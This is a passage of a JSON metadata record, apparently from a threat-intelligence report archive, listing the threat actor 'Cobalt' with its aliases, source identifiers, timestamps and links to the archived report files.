			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434237,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5e909be8ce8fd4a266ff8ce956ee2db237761b95.pdf",
		"text": "https://archive.orkl.eu/5e909be8ce8fd4a266ff8ce956ee2db237761b95.txt",
		"img": "https://archive.orkl.eu/5e909be8ce8fd4a266ff8ce956ee2db237761b95.jpg"
	}
}